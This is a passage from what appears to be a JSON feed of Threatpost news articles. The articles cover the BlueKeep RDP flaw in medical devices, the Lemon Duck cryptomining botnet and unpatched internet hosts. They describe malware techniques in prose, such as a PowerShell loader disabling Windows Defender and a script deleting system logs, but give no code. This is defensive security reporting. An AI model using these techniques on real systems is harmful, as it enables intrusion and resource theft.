complexity that involves managing networks with vast amounts of connected devices, it is not surprising that many of these devices have slipped through the cracks and remain vulnerable to threats such as BlueKeep,\u201d Ragland told Threatpost. 
\u201cAs always, the most effective risk mitigation techniques involve turning off unnecessary services, implementing network level authentication [for RDP], blocking access to sensitive ports, and ensuring timely security updates.\u201d\n\nChris Morales, head of security analytics at Vectra, told Threatpost that part of the problem also stems from a lack of accountability on the manufacturer, as devices are often brought in by medical staff and no one bothers to inform IT or security.\n\n\u201cMost medical devices are not updated as they serve a specific lifesaving function,\u201d he told Threatpost. \u201cWhile an OS update might seem benign, any interruption with the functioning of a medical device could have serious implications. Now this isn\u2019t a total excuse for not updating. Manufacturers need update testing processes that enable to have a timeline for validation and updating.\u201d\n\nMedical devices continue to be discovered riddled with vulnerabilities. Earlier this month, [Medtronic released updates](<https://threatpost.com/medtronic-patches-implanted-device-carelink/152533/>) to address known vulnerabilities in its line of connected medical devices that were initially disclosed last year and in 2018. In January, [researchers found six vulnerabilities](<https://threatpost.com/critical-mdhex-bugs-ge-medical-devices/152163/>) in a range of GE Healthcare devices for hospitals, which could allow attackers to disable the devices, harvest personal health information (PHI), change alarm settings and alter device functionality. In 2019, the Food and Drug Administration (FDA) [issued an emergency alert](<https://threatpost.com/fda-warns-of-potentially-fatal-flaws-in-medtronic-insulin-pumps/146109/>), warning that Medtronic MiniMed insulin pumps are vulnerable to potentially life-threatening cyberattacks.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/19151849/hospitals.png>)\n\nThese security issues are leading to real-life attacks. 
In 2019, for instance, hospitals reported security incidents ranging from a server misconfiguration exposing data of 973,024 patients at UW Medicine, to phishing attacks compromising data at UConn Health and Oregon Department of Human Services, all the way up to full-fledged ransomware attacks at the Columbia Surgical Specialist of Spokane, Sarrell Dental and Hospital Pavia Hato Rey.\n\nThomas Hatch, CTO and Co-Founder at SaltStack, told Threatpost that the security issues that the healthcare industry faces \u201cis a tip of the iceberg problem, where the real vulnerabilities are much more vast than what we can even see.\u201d\n\n\u201cIoT devices are notorious for being difficult to patch,\u201d he told Threatpost. \u201cThe systems built around them are designed for, in this case, hospital medical staff, not maintenance. IoT devices get built for the target use case which makes them difficult to maintain because a single doctor\u2019s office can be using many dramatically different devices; an entire hospital is even worse.\u201d\n", "modified": "2020-02-19T20:29:59", "published": "2020-02-19T20:29:59", "id": "THREATPOST:902F021868A194A6F02A30F8709AA730", "href": "https://threatpost.com/bluekeep-flaw-plagues-medical-devices/153029/", "type": "threatpost", "title": "BlueKeep Flaw Plagues Outdated Connected Medical Devices", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T20:42:53", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "Researchers are warning of a recent dramatic uptick in the activity of the Lemon Duck cryptocurrency-mining botnet, which targets victims\u2019 computer resources to mine the Monero virtual currency.\n\nResearchers warn that Lemon Duck is \u201cone of the more complex\u201d mining botnets, with 
several interesting tricks up its sleeve. While the botnet has been active since at least the end of December 2018, researchers observed an increase in DNS requests connected with its command-and-control (C2) and mining servers since the end of August, in a slew of attacks centered on Asia (including ones targeting Iran, Egypt, Philippines, Vietnam and India).\n\n\u201cCisco Talos has identified activity in our endpoint telemetry associated with Lemon Duck cryptocurrency mining malware, affecting three different companies in the government, retail, and technology sectors,\u201d said researchers with Cisco Talos, in [Tuesday research](<https://blog.talosintelligence.com/2020/10/lemon-duck-brings-cryptocurrency-miners.html>). \u201cWe observed the activity spanning from late March 2020 to present.\u201d\n\nMore recent attacks have included less-documented modules that are loaded by the main PowerShell component \u2013 including a Linux branch and a module allowing further spread by sending [emails to victims with COVID-19 lures](<https://threatpost.com/cyberattackers-1-5m-covid-19-emails-per-day/154970/>).\n\nThreatpost has reached out to researchers for further information about how many victims have been targeted and the extent to which the botnet\u2019s operators have profited off of the cryptomining attacks.\n\n## **Lemon Duck**\n\nLemon Duck has at least 12 independent infection vectors \u2013 more than most malware. 
These capabilities range from Server Message Block (SMB) and Remote Desktop Protocol (RDP) password brute-forcing, sending emails with exploit attachments and exploiting the [RDP BlueKeep flaw](<https://threatpost.com/critical-microsoft-remote-desktop-flaw-fixed-in-security-update/148982/>) (CVE-2019-0708) on Windows machines, to targeting vulnerabilities in Redis (an open-source, in-memory data structure store used as a database, cache and message broker) and YARN Hadoop (a resource-management and job-scheduling technology) on Linux machines.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/13155059/image18.jpg>)\n\nLemon Duck botnet August activity. Credit: Cisco Talos\n\nAfter the initial infection, a PowerShell loading script is downloaded, which utilizes the function \u201cbpu\u201d to disable Windows Defender real-time detection and put powershell.exe on the list of processes excluded from scanning.\n\n\u201cbpu\u201d also checks if the script is running with administrative privileges. If it is, the payload is downloaded and run using the Invoke-Expression cmdlet (a function that can be utilized for calling code within a script or building commands to be executed later). If not, it leverages existing system executables to launch the next stage.\n\n\u201cThis is a good starting point for analysis and retrieval of additional modules,\u201d said researchers. \u201cAlmost all PowerShell modules are obfuscated with four or five layers of obfuscation, likely generated by the Invoke-Obfuscation module. 
Although they are relatively easy to remove, they still slow down the analysis process and make detection using regular signatures more difficult.\u201d\n\nThese executable modules, which are downloaded and driven by the main module, communicate with the C2 server over HTTP.\n\n## **Modular Functionalities**\n\nThe modules include a main loader, which checks the level of user privileges and components relevant for mining, such as the type of the available graphics card (including GTX, [Nvidia](<https://threatpost.com/nvidia-windows-gamers-graphics-driver-bugs/156911/>), [GeForce](<https://threatpost.com/nvidia-geforce-experience-bug/143196/>), [AMD](<https://threatpost.com/amd-downplays-cpu-threat-opening-chips-to-data-leak-attacks/153516/>) and [Radeon](<https://threatpost.com/amd-radeon-cards-vmware-workstations/148406/>)). If these GPUs are not detected, the loader downloads and runs the commodity XMRig CPU-based mining script.\n\nOther modules include a main spreading module (which researchers say includes \u201ca rather ambitious piece of code\u201d containing more than 10,000 lines of code), a Python-based module packaged using Pyinstaller, and a killer module designed to disable known competing mining botnets.\n\nLemon Duck also includes an email-spreading module, which sends emails using a mix of COVID-19-related subject lines and text, as well as other emotion-driven lures (such as an email subject \u201cWTF\u201d with the text \u201cWhat\u2019s wrong with you?are you out of your mind!!!!!!!\u201d). These emails contain an infected attachment sent using Outlook automation to every contact in the affected user\u2019s address book.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/13160429/image15.png>)\n\nAn example of an email sent by the Lemon Duck module. Credit: Cisco Talos\n\n## **Linux Branch**\n\nResearchers also shed light on a less documented Linux branch of the Lemon Duck malware. 
These Lemon Duck bash scripts are executed after the attacker successfully compromises a Linux host (via Redis, YARN or SSH). There are two main bash scripts, said researchers: The first collects some data about the infected host and attempts to download a Linux version of the XMRig miner, before attempting to delete various system logs. The second attempts to terminate and remove competing cryptocurrency miners already present on the system.\n\n\u201cThe script also attempts to terminate and uninstall processes related to Alibaba and Tencent cloud security agents. The script seems to be shared between several Linux-based cryptomining botnets,\u201d said researchers.\n\nLemon Duck was previously spotted in 2020 in a campaign targeting printers, smart TVs and automated guided vehicles that depend on Windows 7. [Researchers in February warned that](<https://threatpost.com/lemon-duck-malware-targets-iot/152596/>) the processor-intensive mining efforts are taking their toll on gear and triggering equipment malfunctions along with exposing devices to safety issues, disruption of supply chains and data loss.\n\nDefenders can stomp out the threat of cryptocurrency attacks by monitoring system behavior to spot any resource-sucking threats.\n\n\u201cCryptocurrency-mining botnets can be costly in terms of the stolen computing cycles and power consumption costs,\u201d they said. \u201cWhile organizations need to be focused on protecting their most valuable assets, they should not ignore threats that are not particularly targeted toward their infrastructure.\u201d\n", "modified": "2020-10-13T20:41:52", "published": "2020-10-13T20:41:52", "id": "THREATPOST:78996437466E037C7F29EFB1FFBBAB42", "href": "https://threatpost.com/lemon-duck-cryptocurrency-botnet/160046/", "type": "threatpost", "title": "Lemon Duck Cryptocurrency-Mining Botnet Activity Spikes", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-11T11:46:30", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "One million devices are still vulnerable to BlueKeep, a critical Microsoft bug with \u201cwormable\u201d capabilities, almost two weeks after a patch was released.\n\nThe flaw ([CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)) was fixed during Microsoft\u2019s [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin earlier this month. 
System administrators were urged to immediately deploy fixes as the flaw could pave the way for a similar rapidly-propagating attack on the [scale of WannaCry](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>).\n\nDespite that, researchers on Tuesday warned that one million devices linked to the public internet are still vulnerable to the bug. Making matters worse, a spike in scans for vulnerable systems was [spotted over the weekend](<https://twitter.com/GreyNoiseIO/status/1132101252006010880>) \u2013 potentially indicating that bad actors are looking to sniff out the activity.\n\n\u201cThat means when the worm hits, it\u2019ll likely compromise those million devices,\u201d said Robert Graham, researcher with Errata Security in a [Tuesday analysis](<https://blog.erratasec.com/2019/05/almost-one-million-vulnerable-to.html#.XO0rtS-ZPdd>). \u201cThis will likely lead to an event as damaging as WannaCry and notPetya from 2017 \u2013 potentially worse, as hackers have since honed their skills exploiting these things for ransomware and other nastiness.\u201d\n\n## BlueKeep\n\nThe critical remote code-execution flaw exists in Remote Desktop Services and impacts older versions of Windows, including Windows 7, Windows XP, Server 2003 and Server 2008 (Microsoft deployed patches to Windows XP and Windows 2003 for the bug during Patch Tuesday, neither of which is still supported via monthly Patch Tuesday updates).\n\n\u201cBlueKeep\u201d has worried the infosec community because researchers describe it as a \u201cwormable\u201d flaw, similar to the EternalBlue exploit that was used by rapidly-moving malware [attacks in 2017 like WannaCry](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) or NotPetya.\n\n\u201cThis [bug] would have the potential of a global WannaCry-level event,\u201d said Chris Goettl, director of product 
management for security at Ivanti, during Patch Tuesday. \u201cWhat\u2019s more, Microsoft has released updates for Windows XP and Server 2003 (which you wouldn\u2019t have found unless you were looking at the Windows Update Catalog). So, this affects Windows 7, Server 2008 R2, XP and Server 2003.\u201d\n\n## Vulnerable Devices\n\nWhile Microsoft urged administrators to update impacted Windows systems as soon as possible, researchers said as recently as Tuesday that one million devices remain vulnerable to BlueKeep.\n\nErrata Security\u2019s Graham conducted a scan using his [Masscan](<https://github.com/robertdavidgraham/masscan>) Internet-scale port scanner (which searches for open ports) to look for the port (3389) used by Remote Desktop. This pinpointed all open ports \u2013 from there, in order to discover whether or not they were vulnerable, Graham used a Remote Desktop Protocol scanning project developed by [the Shadowserver Foundation](<https://rdpscan.shadowserver.org/>). From there, he found that almost one million devices both reliably talk to the Remote Desktop protocol and are vulnerable to BlueKeep.\n\n\u201cThe upshot is that these tests confirm that roughly 950,000 machines are on the public Internet that are vulnerable to this bug,\u201d said Graham. 
\u201cHackers are likely to figure out a robust exploit in the next month or two and cause havoc with these machines.\u201d\n\nIn the meantime, vendors are coming out with their own advisories for vulnerable devices.\n\nImpacted devices include Siemens devices used in the medical space \u2013 including [radiation oncology](<https://cert-portal.siemens.com/productcert/pdf/ssa-433987.pdf>) products, [laboratory diagnostics](<https://cert-portal.siemens.com/productcert/txt/ssa-832947.txt>) products, [Radiography and Mobile X-ray](<https://cert-portal.siemens.com/productcert/pdf/ssa-932041.pdf>) products and [point of care diagnostics](<https://cert-portal.siemens.com/productcert/pdf/ssa-616199.pdf>) products.\n\n\u201cSome of these Siemens Healthineers products are affected by this vulnerability,\u201d said Siemens [in an advisory](<https://cert-portal.siemens.com/productcert/pdf/ssb-501863.pdf>). \u201cDepending on the target system and intent of the attacker, a successful exploit could result in data corruption and potential harm for patients and/or the environment.\u201d\n\nSiemens medical products, under its \u201cHealthineers\u201d line, were also hit by the [WannaCry ransomware](<https://threatpost.com/patches-pending-for-medical-devices-hit-by-wannacry/125758/>) in 2017. Siemens said it has scheduled some patches for these products in June, but for the most part suggested that end users disable Remote Desktop Protocol.\n\n## Increase in Scans\n\nThreat actors are also actively sniffing out vulnerable devices. Researchers with GreyNoise over the weekend said that they are \u201cobserving sweeping tests for systems vulnerable to the RDP \u2018BlueKeep\u2019 (CVE-2019-0708) vulnerability from several dozen hosts around the Internet.\u201d\n\n> GreyNoise is observing sweeping tests for systems vulnerable to the RDP \"BlueKeep\" (CVE-2019-0708) vulnerability from several dozen hosts around the Internet. 
This activity has been observed from exclusively Tor exit nodes and is likely being executed by a single actor. [pic.twitter.com/iGwuGuD4Rq](<https://t.co/iGwuGuD4Rq>)\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [May 25, 2019](<https://twitter.com/GreyNoiseIO/status/1132101252006010880?ref_src=twsrc%5Etfw>)\n\nThe activity is likely being executed by a single actor, they said.\n\n\u201cThe reason we think it\u2019s one actor is because all connections that we\u2019re seeing are originating from Tor, and all of them are using the same scanner code, which we\u2019ve developed a fingerprint for,\u201d Andrew Morris, with GreyNoise, told Threatpost. \u201cWe don\u2019t necessarily know that the actor is malicious. This is simply based on the fact that they are coming out of Tor nodes exclusively and not coming from a known-legitimate mass scanner service like Shodan.\u201d\n\nResearchers, for their part, said that there are several steps that end users can take to protect themselves, but the very first is \u201cto apply Microsoft\u2019s patches, including old Windows XP, Windows Vista, and Windows 7 desktops and servers,\u201d said Graham.\n", "modified": "2019-05-28T14:39:54", "published": "2019-05-28T14:39:54", "id": "THREATPOST:4F23E34A058045723339C103BC41A3D1", "href": "https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/", "type": "threatpost", "title": "One Million Devices Open to Wormable Microsoft BlueKeep Flaw", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-11T11:41:37", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "The nightmare vision of a \u201cmega-worm\u201d global BlueKeep infection could be closer to becoming reality as working exploits are now becoming available to the public, and there\u2019s evidence that adversaries are actively scanning for the vulnerability.\n\nResearchers weighed in with Threatpost about how enterprises can thwart the critical Windows remote code-execution (RCE) vulnerability, even if immediate patching is too large an ask.\n\n## Exploits Make an Appearance\n\nBy way of background, the BlueKeep RCE vulnerability (CVE-2019-0708) exists in Remote Desktop Services and impacts older versions of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a WannaCry-level, fast-moving infection wave.\n\n\u201cBlueKeep is a use-after-free vulnerability, meaning that the program tries to use memory after it is supposed to have discarded it,\u201d according to a [May analysis](<https://news.sophos.com/en-us/2019/05/14/may-2019-patch-tuesday-addresses-critical-remote-desktop-dhcp-bugs/>) from security firm Sophos. 
\u201cThe vulnerability lies in termdd.sys, which is the RDP kernel driver. A user can exploit this by opening an RDP connection to a remote computer called a channel \u2013 in this case a default RDP channel called MS_T210 \u2013 and sending specially crafted data to it.\u201d\n\nSecurity researchers have said that creating an exploit has been difficult, often leading to crashing and DoSing the target machine rather than RCE. However, some [have been able to create](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) working exploits (including the [Department of Homeland Security](<https://threatpost.com/working-bluekeep-exploit-developed-by-dhs/145784/>)), but have kept mum on the details in order to protect the public.\n\nThat changed last week when an exploit went up for sale via a security firm that would allow an attacker to run code remotely on the compromised machine and then create a worm that uses RDP to exploit other machines without any human interaction.\n\nImmunity Inc. said via Twitter that it has added a working BlueKeep exploit module to its CANVAS automated exploitation platform, which is available as a subscription (albeit for an expensive monthly rate):\n\n> New Release \u2013 CANVAS 7.23: This release features a new module for the RDP exploit, BLUEKEEP. Check out our video demonstration here: <https://t.co/azCuJp1osI> [#bluekeep](<https://twitter.com/hashtag/bluekeep?src=hash&ref_src=twsrc%5Etfw>) [#cve20190708](<https://twitter.com/hashtag/cve20190708?src=hash&ref_src=twsrc%5Etfw>) [#exploit](<https://twitter.com/hashtag/exploit?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 Immunity Inc. (@Immunityinc) [July 23, 2019](<https://twitter.com/Immunityinc/status/1153752470130221057?ref_src=twsrc%5Etfw>)\n\nDave Aitel, CTI at Immunity\u2019s parent company, Cyxtera, said via email that the company decided to release the exploit because \u2